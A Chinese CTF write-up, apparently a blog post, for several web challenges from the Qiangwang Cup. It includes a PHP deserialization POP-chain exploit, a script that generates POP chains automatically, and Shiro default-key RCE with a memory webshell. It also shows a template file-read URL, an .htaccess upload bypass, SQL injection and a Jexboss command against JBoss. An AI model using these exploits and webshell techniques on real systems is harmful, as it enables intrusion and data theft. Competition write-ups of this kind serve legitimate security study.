强网杯 部分WEB WP
强网杯 部分WEB WP

Web

赌徒

随便好像就能读文件了,直接读/flag 。。。、

<?php

class Start
{
    public $name;
    public $flag='syst3m("cat 127.0.0.1/etc/hint");';


    public function _sayhello(){
        echo $this->name;
        return 'ok';
    }

    public function __wakeup(){
        //echo "hi";
        $this->_sayhello();
    }
    public function __get($cc){
        echo "give you flag : ".$this->flag;
        return ;
    }
}

class Info
{
    private $phonenumber=123123;
    public $promise='I do';


    public function __toString(){
        return $this->file['filename']->ffiillee['ffiilleennaammee'];
    }
}

class Room
{
    public $filename='/flag';
    public $sth_to_set;
    public $a='';

    public function __get($name){
        $function = $this->a;
        return $function();
    }

    public function Get_hint($file){
        $hint=base64_encode(file_get_contents($file));
        echo $hint;
        return ;
    }

    public function __invoke(){
        $content = $this->Get_hint($this->filename);
        echo $content;
    }
}

$r1 = new Room;
$r1->filename = '/etc/passwd';
$r2 = new Room;
$r2->a = $r1;

$s = new Start;
$i = new Info;

$i->file['filename'] = $r2;

$s->name = $i;

print_r(urlencode(serialize($s))."\r\n");

unserialize(serialize($s));

pop_master

PHP_Parser生成AST存在a.json里

然后python写个脚本BFS找通路,用极其暴力的方法剪枝。。。

脚本如下

import json
import queue

ast = json.load(open('a.json','rb'))

classes = {}

for i in range(len(ast)):
    classes[ast[i]['name']['name']] = ast[i]

f2cTable = {}
#ban_function = ['YkN508','frZNkk','N3R1ow','N3R1ow','CCO4GN','LCG9b8','ILnKZX']

ban_function = []

for pclass in ast:
    for f in pclass["stmts"]:
        if f['nodeType'] == "Stmt_ClassMethod":
            f2cTable[f['name']['name']] = pclass['name']['name']

#print(f2cTable['GCLh2c'])

#print(classes_index)

#entrypoint_class = 
#entrypoint_args = "cat /flag"

visit_function = {}

q = queue.SimpleQueue()

class State:
    def __init__(self,curClassName,curFunctionName,father):
        self.className = curClassName
        self.functionName =curFunctionName
        self.father = father

initState = State('MoAUb1',"HsGsAu",None)

def printTree(s:State):
    ret = f"$my{s.className} = new {s.className};\r\n"
    father = s.father
    while father != None:
        tmp = f"$my{father.className} = new {father.className};\r\n"
        tmp += f"$my{father.className}->{classes[father.className]['stmts'][0]['props'][0]['name']['name']} = $my{s.className};\r\n"
        s = father
        father = father.father
        ret +=tmp
    print(ret)

q.put(initState)

while not q.empty():
    curState = q.get()
    if hasattr(visit_function,curState.className+curState.functionName):
        continue
    else:
        visit_function[curState.className+curState.functionName] = True
        if curState.functionName in ban_function:
            continue
        cur_fuction = ''
        for f in classes[curState.className]["stmts"]:
            if f['nodeType'] == "Stmt_ClassMethod":
                if f['name']['name'] == curState.functionName:
                    cur_fuction = f
                    break

        cur_param = cur_fuction['params'][0]['var']['name']


        for stmt in cur_fuction['stmts']:
            if stmt['nodeType'] == 'Stmt_Expression':
                if stmt['expr']['nodeType'] == "Expr_Assign" and stmt['expr']['var']['name'] == cur_param:
                    print(stmt['expr']['var']['name'],cur_param)
                    break

                elif stmt['expr']['nodeType'] == "Expr_Eval":
                    #print("yes")
                    printTree(curState)
                    exit(0)
                elif stmt['expr']['nodeType'] == "Expr_MethodCall":
                    #print(curState.className,'->',f2cTable[next_f])
                    next_f = stmt['expr']['name']['name']
                    q.put(State(f2cTable[next_f],next_f,curState))
                    #printTree(curState)
                    #exit(0)
            elif stmt['nodeType'] == 'Stmt_For':
                flag = 0
                for forstmt in stmt['stmts']:
                    if forstmt['nodeType'] == 'Stmt_Expression':
                        if forstmt['expr']["var"]["name"] == cur_param:
                            flag = 1
                            break
                if flag==1:
                    break
            elif stmt['nodeType'] == 'Stmt_If':
                if stmt['cond']['nodeType'] == "Expr_FuncCall":
                    next_f = stmt['cond']['args'][1]['value']['value']
                    #print(curState.className,'->',f2cTable[next_f])
                    q.put(State(f2cTable[next_f],next_f,curState))
        #exit(0)

自动生成POP链手动打

Hard_Penetration

首先进去是个登录页面,发现set-cookie:Rememerme=deleteMe
很明显shiro框架,尝试shiro反序列化打,需要找AES的密钥,一般为硬编码默认的密钥

密钥硬编码,直接RCE,注入冰蝎内存马后发现:
netstat看下,结合ports.conf发现在8005端口还开放web服务

内网代理出来发现是一个cms,并且存在后台,而且后台给出了是juhucms

而且该CMS直接可以遍历文件,发现其目录结构和baoCMS完全一致,下载源码进行审计发现在模板处理处:

和74cms的模板注入比较类似,继续向上看fetch的调用发现:

display调用了fetch,一般display也就是模板的渲染,因此我们需要找一个可以访问的路由,并且使得templateFile可控,全局搜索:

这些CommonAction都有该方法,但是有很多鉴权需要登录后台,而后台口令默认口令和弱口令貌似都进不去,发现在wap模块中:

这是可访问的路由,并且不需要鉴权,因此我们构造访问路由即可:

http://127.0.0.1:8005/wap/common/show?templateFile=/flag

EasyWeb

进入给了Hint说端口在30000-50000,扫端口发现:36842
一个登录页面,但是username存在注入,SQLMAP直接梭了,得到

admin 99f609527226e076d668668582ac4420
进去一顿试,题目说是easy_SSRF,结果后台有个/file能上传文件。。。
对文件内容和名字进行过滤,上传.htaccess
AddHandler php5-script aaa
然后上传一个aaa.aaa

传个马上去然后看下其他人操作和netstat

发现8006开了jboss,而且是root开的,flag是root才可读

直接用Jexboss梭了

不过我弹shell之后本地用,可以root但是无法执行命令,队友试了下可以

python3 .\jexboss.py -u http://127.0.0.1:8006

直接cat flag

寻宝

Part1 绕过如下

Part2 idm下载 全局搜索KEY2

import os
import docx
import base64
import binascii
import shutil

dir_path = "five_month"

for root,dirs,files in os.walk(dir_path):
    for filename in files:
        #print(file)
        filepath = os.path.join(root, filename)
        if filename.endswith(".docx"):
            file = docx.Document(filepath)
            fulltext = ''
            for f in file.paragraphs:
                fulltext += f.text
            #print(fulltext)
            try:
                raw = fulltext.encode()
                if b"KEY2" in raw:
                    with open(filename+".png","wb") as o:
                        o.write(raw)
            except binascii.Error:
                pass
        if filename.endswith(".png"):
            shutil.copy(filepath,filename)
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇